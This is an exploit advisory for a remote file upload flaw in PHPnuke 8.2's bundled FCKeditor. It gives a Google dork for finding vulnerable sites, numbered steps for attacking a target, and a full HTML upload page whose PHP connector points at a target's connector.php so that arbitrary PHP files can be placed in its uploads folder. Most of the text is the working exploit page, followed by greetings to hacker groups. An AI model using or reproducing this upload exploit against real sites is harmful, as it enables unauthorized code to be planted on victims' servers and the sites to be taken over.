# Title : PHPnuke 8.2 Remote Upload File Exploit # Author : Net.Edit0r # Location : Iran # Dork : "POWERED BY PHPNUKE.IR" # Category : Remote # Email : Net.Edit0r@Att.net ~ Black.Hat.TM@Gmail.com # Special Thanks To :NetQurd (For help in finding bugs) > Email :NetQurd@Live.CoM [~]######################################### InformatioN #############################################[~] [~] 1.Save code html format [~] 2.Search Target.com [~] 3.Edit and replace & Target [~] 4.Save Html Page [~] 5.Open Page Html (Edite Source) [~] 6.Set Format PHP [~] 7.Choose File & Upload [~] 8.Formats can be uploaded (Html.Htm.Jpg.gif.Xml....) [~] 9.Target.com/images/uploads/File/File Name [~]######################################### ExploiT #############################################[~] [~] 1. Exploit File : <!-- * FCKeditor - The text editor for Internet - http://www.Sun * Test page for the File Browser connectors. --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FCKeditor - By Net.Edit0r</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> </head> <body> <table height="100%" cellspacing="0" cellpadding="0" width="100%" border="0"> <tr> <td> <table cellspacing="0" cellpadding="0" border="0"> <tr> <td> Connector:<br /> <select id="cmbConnector" name="cmbConnector"> <option value="asp/connector.asp" selected="selected">ASP</option> <option value="aspx/connector.aspx">ASP.Net</option> <option value="cfm/connector.cfm">ColdFusion</option> <option value="lasso/connector.lasso">Lasso</option> <option value="perl/connector.cgi">Perl</option> <option value=" http://Target.com/includes/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php ">PHP</option> <option value="py/connector.py">Python</option> </select> </td> <td> </td> <td> Current Folder<br /> <input id="txtFolder" type="text" value="/" name="txtFolder" /></td> <td> </td> <td> Resource Type<br /> <select id="cmbType" name="cmbType"> <option value="File" selected="selected">File</option> <option value="Image">Image</option> <option value="Flash">Flash</option> <option value="Media">Media</option> <option value="Invalid">Invalid Type (for testing)</option> </select> </td> </tr> </table> <br /> <table cellspacing="0" cellpadding="0" border="0"> <tr> <td valign="top"> <a href="https://www.exploit-db.com/exploits/14058/#" onclick="GetFolders();">Get Folders</a></td> <td> </td> <td valign="top"> <a href="https://www.exploit-db.com/exploits/14058/#" onclick="GetFoldersAndFiles();">Get Folders and Files</a></td> <td> </td> <td valign="top"> <a href="https://www.exploit-db.com/exploits/14058/#" onclick="CreateFolder();">Create Folder</a></td> <td> </td> <td valign="top"> <form id="frmUpload" action="" target="eRunningFrame" method="post" enctype="multipart/form-data"> File Upload<br /> <input id="txtFileUpload" type="file" name="NewFile" /> <input type="submit" value="Upload" onclick="SetAction();" /> </form> </td> </tr> </table> <br /> URL: <span id="eUrl"></span> </td> </tr> <tr> <td height="100%" valign="top"> <iframe id="eRunningFrame" src="javascript:void(0)" name="eRunningFrame" width="100%" height="100%"></iframe> </td> </tr> </table> </body> </html> [~]######################################## ThankS To ... #########################################[~] [~] Special Thanks To My Best FriendS : NetQard , B3hz4d , Raiden , ~[ CriMe ]~ , † CoNstaNtine † , _R3v4l_ , ~~XTerror~~ , __l2o5v4__ , Zend [~] IRANIAN Young HackerZ [~] GreetZ : Sun-Army.Org , Phc.Ir , Dark-tunnel.com , AttackerZ.IR [~]######################################### FinisH :D #############################################[~]
体验盒子
